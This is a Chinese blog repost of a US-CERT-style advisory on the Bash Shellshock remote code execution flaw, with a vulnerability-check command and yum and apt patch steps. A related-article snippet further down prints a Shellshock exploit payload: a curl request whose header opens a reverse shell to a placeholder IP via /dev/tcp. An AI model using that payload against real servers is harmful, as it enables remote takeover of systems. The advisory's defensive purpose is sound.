Bash 远程任意代码执行安全漏洞

最新推荐文章于 2022-08-30 17:17:40 发布
最新推荐文章于 2022-08-30 17:17:40 发布
阅读量301 收藏
点赞数
文章标签: shell 操作系统 运维
原文链接:https://yq.aliyun.com/articles/117237
版权

US-CERT 意识到 Bash 存在一个安全的漏洞,该漏洞直接影响基于 Unix 的系统(如 Linux、OS X 等)。该漏洞将导致远程攻击者在受影响的系统上执行任意代码。

US-CERT 建议用户和管理员重新检查这篇红帽的安全博客。更多的详情只能参考相应 Linux 发行商以获取相应补丁。

你可以使用如下命令来检查系统存在此漏洞:

env x='() { :;}; echo vulnerable' bash -c "echo this is a test"

受影响的系统包括:

  • CentOS
  • Debian
  • Redhat
  • Ubuntu

红帽系可通过更新 bash 并重启系统来解决这个问题:

# yum update bash

或者:

# yum update bash-4.1.2-15.el6_5.1

此举只是更新了 bash 包,还需要重启系统才能生效。

Ubuntu 用户可以通过如下命令打补丁,无需重启:

apt-get update
apt-get install bash

文章转载自 开源中国社区 [http://www.oschina.net]

weixin_34416754
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Bash 远程任意代码执行安全漏洞(最严重漏洞
weixin_33804582的博客
09-25 402
US-CERT 意识到 Bash 存在一个安全的漏洞,该漏洞直接影响基于 Unix 的系统(如 Linux、OS X 等)。该漏洞将导致远程***者在受影响的系统上执行任意代码。US-CERT 建议用户和管理员重新检查这篇红帽的安全博客。更多的详情只能参考相应 Linux 发行商以获取相应补丁。你可以使用如下命令来检查系统存在此漏洞:#envx='(){:;};ec...
Linux系统服务器 GNU Bash 环境变量远程命令执行漏洞修复命令
weixin_33951761的博客
09-26 176
具体方法就是在ssh上执行 yum update bash 完成后重启VPS。 转载于:https://www.cnblogs.com/afish/p/3994481.html
linux远程代码执行漏洞,Bash 远程任意代码执行安全漏洞(最严重漏洞
weixin_39785970的博客
05-08 198
Bash 远程任意代码执行安全漏洞(最严重漏洞)如下命令来检查系统存在此漏洞:#envx='(){:;};echovulnerable'bash-c"echothisisatest"vulnerablethisisatest修复后结果#envx='(){:;};echovulnerable'bash-c"echothisisatest"ba...
suse linux bash漏洞,GNU Bash不完整修复远程代码执行漏洞(CVE-2014-6278)
weixin_29752389的博客
05-16 947
发布日期:2014-09-27更新日期:2014-10-08受影响系统:GNU Bash <= 4.3 bash43-026描述:BUGTRAQ ID: 70166CVE(CAN) ID: CVE-2014-6278Bash,Unix shell的一种,在1987年由布莱恩·福克斯为了GNU计划而编写。GNU Bash 4.3 bash43-026及之前版本没有正确解析环境变量值中的函数定...
Bash高危安全漏洞 解决方案
09-27
当用户正常访问时,只要shell是唤醒状态,这个漏洞就允许攻击者执行任意代码命令,并且已经在企业级软件中存在好长时间。 Bash漏洞的严重级别为“10”。它与“心脏出血”漏洞不同,“心脏出血”只能借助窃取用户电脑...
Linux Bash漏洞详细说明
10-09
当这些变量包含可执行代码时,Bash会在解析环境变量时执行这些代码,允许攻击者在不直接访问目标系统的情况下远程执行任意命令。攻击者可以通过注入恶意代码到特定的环境变量中,使得Bash执行命令时无意中执行...
Bash漏洞——Shellshock浅析.pdf
07-10
Bash漏洞,又称Shellshock,是指在2014年被发现的一个严重安全漏洞,它影响了广泛使用的Bash shell,这是一个在Unix-like操作系统,包括Linux和Mac OS X中的命令行解释器。这个漏洞的存在使得攻击者能够通过环境变量...
Linux Bash严重漏洞紧急修复方案
10-17
今天刚刚爆出Bash安全漏洞Bash存在一个安全的漏洞,该漏洞直接影响基于Unix的系统(如Linux、OS X 等)。该漏洞将导致远程攻击者在受影响的系统上执行任意代码
RHEL 5 6 bash补丁
09-30
攻击者可以通过构造特定的HTTP头、CGI参数或其他方式,将恶意代码注入到系统环境中,导致远程代码执行,进一步控制服务器或执行任意操作。 **补丁安装与安全措施** RHEL 5和6的用户应当立即检查并安装这个bash补丁...
php cve-2014-9427漏洞,GNU Bash环境变量远程任意代码执行漏洞CVE-2014-6271
weixin_29255731的博客
04-02 805
ps:利用payloadcurl http://xxx.xxx.xxx.xxx/cgi-bin/vulnerable -A "() { :;}; /bin/sh -i >& /dev/tcp/REVERSE_SHELL_IP/PORT 0>&1"发布日期:2014-09-25CVE ID:CVE-2014-6271受影响的软件及系统:==================...
linux远程命令执行漏洞,GestioIP远程命令执行漏洞
weixin_26808205的博客
05-02 116
发布日期:2013-10-04更新日期:2013-10-13受影响系统:GestioIP GestioIP描述:--------------------------------------------------------------------------------GestioIP是用Perl编写的开源IP地址管理解决方案。GestioIP在 ip_checkhost.cgi 处理ping ...
Bash4.3 远程命令执行漏洞
whatiwhere的博客
12-03 2464
实验环境 实验环境 操作机系统:Kali Linux 目标网站:172.16.12.2/cgi-bin/poc.cgi 实验目的 了解本次漏洞形成的原理 学会如何去修复此漏洞 实验工具 NC :是网络工具中的瑞士军刀,它能通过TCP和UDP在网络中读写数据。通过与其他工具结合和重定向,可以在脚本中以多种方式使用它。 Burp Suite:是用于攻击web 应用程序的集成平台。它包含了许多...
漏洞复现——bash远程解析命令执行漏洞
weixin_30314793的博客
11-23 520
漏洞描述:Bash脚本在解析某些特殊字符串时出现逻辑错误导致可以执行后面的命令,在一些cgi脚本中,数据是通过环境变量来传递的,这样就会形成该漏洞 漏洞原理:bash通过以函数名作为环境变量名,以“(){”(bash只有在遇到特殊的环境变量才会触发该漏洞)开头的字串作为环境变量的值来将函数定义导出为环境变量。而该漏洞就在于BASH处理这样的“函数环境变量”的时候,并没有以函数结尾“}”...
linux远程代码执行漏洞,Bash远程任意代码执行安全漏洞(最严重漏洞
weixin_39928993的博客
05-08 251
US-CERT 意识到 Bash 存在一个安全的漏洞,该漏洞直接影响基于 Unix 的系统(如 Linux、OS X 等)。该漏洞将导致远程攻击者在受影响的系统上执行任意代码。US-CERT 建议用户和管理员重新检查[url title="" href="https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-enviro...
linux漏洞 远程,Bash 远程任意代码执行安全漏洞(最严重漏洞
weixin_39611047的博客
05-06 275
US-CERT 意识到 Bash 存在一个安全的漏洞,该漏洞直接影响基于 Unix 的系统(如 Linux、OS X 等)。该漏洞将导致远程攻击者在受影响的系统上执行任意代码。US-CERT 建议用户和管理员重新检查这篇红帽的安全博客。更多的详情只能参考相应 Linux 发行商以获取相应补丁。你可以使用如下命令来检查系统存在此漏洞:env x='() { :;}; echo vulnerable'...
Bash漏洞解析
FeelTouch Labs
09-26 2163
预备知识 Bash UNIX-like系统上的shell,可以让用户在UNIX-like系统输入并执行命令的一个解释器,一般通过ssh或telent实现连接,另外,在WEB服务器上也可以作为CGI脚本的解释器。UNIX-like系统上有多个shell,但它是默认的shellBash漏洞 释义:Bash会对环境变量赋值中的函数定义后的字符串进行处理(言外之意,攻击者可以布局代
学习远程命令执行漏洞笔记
qq_56426046的博客
08-30 1806
以上是我学习完远程命令执行漏洞的学习心得和笔记,望自己能坚持下去。
powershll 远程执行bash shell 脚本
最新发布
06-02
是的,您可以使用 PowerShell 远程执行 Bash shell 脚本。以下是一个示例: ```powershell Invoke-Command -ComputerName remote_computer -ScriptBlock {bash /path/to/script.sh} ``` 在这个示例中,`remote_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值